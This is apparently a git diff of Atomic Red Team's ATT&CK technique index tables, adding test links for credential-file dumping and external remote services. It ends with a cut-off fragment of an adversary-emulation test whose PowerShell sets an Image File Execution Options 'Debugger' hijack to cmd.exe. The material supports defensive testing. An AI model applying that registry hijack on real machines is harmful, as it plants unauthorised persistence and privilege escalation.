-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
@@ -1,7 +1,7 @@
 # All Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
@@ -9,7 +9,7 @@
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -38,7 +38,7 @@
 |  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | [Standard Encoding](../../T1132.001/T1132.001.md) |  |
 |  |  | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) |  |  |  |  | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  |  | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  |  | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) |  |  |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  | [Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
@@ -8,7 +8,7 @@
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -29,7 +29,7 @@
 |  |  | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) |  | [Screen Capture](../../T1113/T1113.md) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  |  | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) |  | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
-|  |  | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  |  | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) |  |  |  |  | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -337,14 +337,23 @@ privilege-escalation:
          type: Path
          default: C:\windows\system32\cmd.exe
      executor:
-        command: "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value
-          = \"#{attached_process}\"\nForeach ($item in $input_table){   \n  $item
-          = $item.trim()\n  $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows
